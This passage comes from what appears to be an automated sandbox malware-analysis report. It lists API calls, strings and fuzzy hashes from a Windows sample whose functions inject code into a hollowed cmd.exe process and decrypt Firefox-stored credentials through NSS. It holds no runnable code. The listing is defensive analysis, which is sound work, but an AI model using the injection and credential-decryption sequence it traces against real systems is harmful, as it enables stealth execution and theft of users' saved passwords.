                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00935CC8
                                                                                                                                                                                                                • Part of subcall function 0093584D: _memset.LIBCMT ref: 00935885
                                                                                                                                                                                                                • Part of subcall function 0093584D: _memset.LIBCMT ref: 00935896
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 009358C1
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 009358DF
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 009358F3
                                                                                                                                                                                                                • Part of subcall function 0093584D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00935906
                                                                                                                                                                                                                • Part of subcall function 0093584D: StrStrA.SHLWAPI(00000000), ref: 009359AA
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00935CEB
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00935C0B
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00935D1A
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935D2E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935D5C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935D6F
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935D7B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00935D98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                              • API String ID: 2636950706-2848263008
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6CAB1C6B
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6CAB1C75
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6CAB1CA1
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6CAB1CA9
                                                                                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6CAB1CB4
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CAB1CCC
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CAB1CE4
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6CAB1CEC
                                                                                                                                                                                                              • malloc.MOZGLUE(00000000), ref: 6CAB1CFD
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6CAB1D0F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6CAB1D17
                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32 ref: 6CAB1D4D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6CAB1D73
                                                                                                                                                                                                              • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CAB1D7F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CAB1D7A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                              • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                              • API String ID: 3748115541-1216436346
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6CAB3DFB
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB3EEC
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB3FA3
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CAB4047
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CAB40DE
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB415F
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB416B
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB4288
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB42AB
                                                                                                                                                                                                              • __allrem.LIBCMT ref: 6CAB42B7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                              • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                              • API String ID: 703928654-3678606288
                                                                                                                                                                                                              • Opcode ID: 2795ffec32d492a0ab2c843a67472085ac92025334d8c35861709814761f0f14
                                                                                                                                                                                                              • Instruction ID: 5aa954fb61940a5f191421d78d065a8c34ed51e9965bed8df3c62211d4fd1d8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2795ffec32d492a0ab2c843a67472085ac92025334d8c35861709814761f0f14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F1E371A087409FD715CF38C881A6AB7FAAF85344F188A1DF495A7751EB34E885CB42
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092F551
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,009565A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0092F575
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0092F587
                                                                                                                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0092F599
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0092F5B7
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0092F5CD
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 0092F5DD
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,00000000,00932DA1,?,00000000), ref: 0092F5FC
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0092F632
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,D6D9E8F4,00000004,00000000), ref: 0092F659
                                                                                                                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 0092F66B
                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 0092F674
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                                              • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              • API String ID: 3621800378-4087486346
                                                                                                                                                                                                              • Opcode ID: da090160d39a3b809f2aa24862b1e5df89d085a1c7ff375ebe0b3ba23bca6f00
                                                                                                                                                                                                              • Instruction ID: 82c49a96815d96c10f7158c824f7057b572476c725c6dffd54f6e1617cf9fa1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da090160d39a3b809f2aa24862b1e5df89d085a1c7ff375ebe0b3ba23bca6f00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5413672A00208AFEB11DFA5DC85FAEBBB9FF48705F104064FA05EA161D771AD40DB25
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA61D58
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA61EFD
                                                                                                                                                                                                              • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CA61FB7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • sqlite_master, xrefs: 6CA61C61
                                                                                                                                                                                                              • unsupported file format, xrefs: 6CA62188
                                                                                                                                                                                                              • another row available, xrefs: 6CA62287
                                                                                                                                                                                                              • abort due to ROLLBACK, xrefs: 6CA62223
                                                                                                                                                                                                              • sqlite_temp_master, xrefs: 6CA61C5C
                                                                                                                                                                                                              • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CA61F83
                                                                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 6CA620CA
                                                                                                                                                                                                              • table, xrefs: 6CA61C8B
                                                                                                                                                                                                              • unknown error, xrefs: 6CA62291
                                                                                                                                                                                                              • no more rows available, xrefs: 6CA62264
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                              • API String ID: 563213449-2102270813
                                                                                                                                                                                                              • Opcode ID: db117fd9a8e1744ff606624ea3ca5d4f7230eb682fa9f434fb60577b2f1dcfcc
                                                                                                                                                                                                              • Instruction ID: 3aff78e895b59067de9d146d6df886504f5d08225ad1559c98f6d6e7247c3a7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db117fd9a8e1744ff606624ea3ca5d4f7230eb682fa9f434fb60577b2f1dcfcc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B12D6706083418FD715CF1AC48466ABBF2BF85318F198A6DD9958BF51D731EC8ACB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4ED0A
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4EE68
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4EF87
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA4EF98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA4F48D
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA4F483
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA4F492
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 4101233201-598938438
                                                                                                                                                                                                              • Opcode ID: a2e91d8bc798f799d92a42a720b9d9336cb18c3b0c091809770213808525e46d
                                                                                                                                                                                                              • Instruction ID: c7a9cbff134d1153840a187931ac8ef9ac7c9e2cce1909f988492dda894f6138
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2e91d8bc798f799d92a42a720b9d9336cb18c3b0c091809770213808525e46d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C962E174A042458FDB04CF28C880B9ABBB2BF45318F1CD19DD8555BB92D775E8C6CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CAE7DDC
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAC8298,?,?,?,6CABFCE5,?), ref: 6CB207BF
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB207E6
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB2081B
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB20825
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAE7DF3
                                                                                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CAE7F07
                                                                                                                                                                                                              • PK11_GetPadMechanism.NSS3(00000000), ref: 6CAE7F57
                                                                                                                                                                                                              • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CAE7F98
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6CAE7FC9
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE7FDE
                                                                                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CAE8000
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CAE7F0C,?,00000000,00000000,00000000,?), ref: 6CB0943B
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CB0946B
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CB09546
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE8110
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CAE811D
                                                                                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CAE822D
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAE823C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1923011919-0
                                                                                                                                                                                                              • Opcode ID: 3613aa913e18ce892e775bd5707b4a67abd2cc542039085aba942e10af86edb2
                                                                                                                                                                                                              • Instruction ID: fa90d9a3d623a7da9208b95087b0f9231670f18381f33320d64967127a4de3ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3613aa913e18ce892e775bd5707b4a67abd2cc542039085aba942e10af86edb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C16FB1D402599BEB21CF18CC40BEEB7B9AF09348F0481E5E91DA6641E7319EC5DF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0092CD31
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0092CD48
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009574E4), ref: 0092CD69
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009574E8), ref: 0092CD83
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0092D38A,0095685F,009574EC,?,0095685E), ref: 0092CE16
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00957504,0095686E,?,00957500,009574FC,009574F8,009574F4), ref: 0092D0F7
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092D10B
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092D211
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092D225
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                                              • String ID: %s\*.*
                                                                                                                                                                                                              • API String ID: 3967855609-1013718255
                                                                                                                                                                                                              • Opcode ID: c855315a56b487c53914bd7358db5d5db3a103af29ab513d05c105d99edfb0c7
                                                                                                                                                                                                              • Instruction ID: dfa6a304a47301cebd0d12bea82bf2e1c7d3f7671d966be6bd94615f728c558f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c855315a56b487c53914bd7358db5d5db3a103af29ab513d05c105d99edfb0c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED1A73690112D9BDF21EB25ED46BDDB7B4AFC4304F4141E1B948B7126DA30AF8A8F81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB11F19
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB12166
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB1228F
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB123B8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB1241C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$Error
                                                                                                                                                                                                              • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                              • API String ID: 3204416626-1906384322
                                                                                                                                                                                                              • Opcode ID: 299901f650154c09e4dd3df5074630912175a661567b856c7441f64db40c6d51
                                                                                                                                                                                                              • Instruction ID: 74f188bb098b7fb6aba61e5a2b7f73ff2825f2b352ba53b83317114caf613e19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 299901f650154c09e4dd3df5074630912175a661567b856c7441f64db40c6d51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2702FF62E0C7C86EFB318671D44C3D76AE0DB56328F5C166EC5DE46E83C3A859898393
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C3F
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C60
                                                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6CAC1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C94
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092A7EA
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A805
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0092A80D
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A81B
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A82F
                                                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A86F
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0092A890
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00956801,00956803,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8BA
                                                                                                                                                                                                              • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00956801,0095680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4058207798-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,00956826,?,?,?), ref: 0092B970
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957434), ref: 0092B991
